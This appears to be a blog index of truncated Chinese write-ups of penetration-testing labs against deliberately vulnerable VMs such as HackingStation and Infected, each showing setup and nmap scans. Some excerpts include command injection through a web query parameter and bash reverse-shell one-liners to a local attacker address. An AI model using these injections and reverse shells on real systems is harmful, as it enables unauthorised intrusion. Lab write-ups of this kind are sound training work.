1.1k 1 分钟

# 靶场搭建 下载:Fing Nat,IP: 192.168.1.140 # 渗透过程 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)| ssh-hostkey: | 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)|_ 256...
466 1 分钟

# 靶场搭建 下载地址:HackingStation 直接导入,点击重试,NAT 模式打开就 OK 了 IP: 192.168.1.131 # 渗透过程 # 信息初收集 只开了 80 端口 打开网页抽了一眼有一个搜索,尝试下注入,无果。 仔细看了一下,发现是 searchsploit,怀疑后台是执行的命令,测试一下: http://192.168.1.131/exploitQuery.php?product=blog.gddfeng.com;pwd 返回了路径,OK 了家人,反弹直接拿 shell 1;bash -c 'bash -i >&...
405 1 分钟

# 靶场搭建 下载地址:Infected 导入,Nat 模式,直接开干 IP: 192.168.1.133 # 渗透过程 # 信息初收集 80 端口和 22 发现有 info.php info.php 中发现加载了 mod_backdoor 模块,那就存在后门了,直接干 # 后门利用 网上搜这个模块,找到利用方式 反弹拿到 shell ┌──(root㉿kali)-[~]└─# curl -H 'Backdoor: bash -c "bash -i >& /dev/tcp/192.168.1.129/4444...
1.7k 2 分钟

# 靶场搭建 下载:Look Nat 模式,IP: 192.168.1.134 # 渗透过程 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)| ssh-hostkey: | 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)|_ 256...
631 1 分钟

# 靶场搭建 下载:Mux 下载,导入,NAT,开干 IP: 192.168.1.134 # 渗透过程 # 信息初收集 80/tcp open http Apache httpd 2.4.56 ((Debian))|_http-title: Monna Lisa|_http-server-header: Apache/2.4.56 (Debian)512/tcp open exec netkit-rsh rexecd513/tcp open login514/tcp open tcpwrapped80 端口进去一张图片,下载下来瞅一眼字符串:...
1.5k 1 分钟

# 靶场搭建 下载:Node Nat,IP: 192.168.1.136 # 渗透过程 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)| ssh-hostkey: | 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)|_ 256...
1k 1 分钟

# 靶场搭建 下载:Noob Nat,IP: 192.168.1.135 # 渗透过程 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)| ssh-hostkey: | 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)|_ 256...
1.5k 1 分钟

# 靶场搭建 靶场下载:Plot 下载、导入、Nat IP: 192.168.1.131 # 渗透过程 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)| ssh-hostkey: | 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)|_ 256...
2.3k 2 分钟

# 靶场搭建 下载:Real Nat,IP: 192.168.1.139 # 渗透过程 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)| ssh-hostkey: | 2048 db:28:2b:ab:63:2a:0e:d5:ea:18:8d:2f:6d:8c:45:2d (RSA)| 256 cd:a1:c3:2e:20:f0:f3:f6:d3:9b:27:8e:9a:2d:26:11 (ECDSA)|_ 256...
3.7k 3 分钟

# 靶场搭建 下载:Robot 下载、导入、Nat IP: 192.168.1.128 # 渗透过程 # 信息初收集 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)| ssh-hostkey: | 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)|_ 256...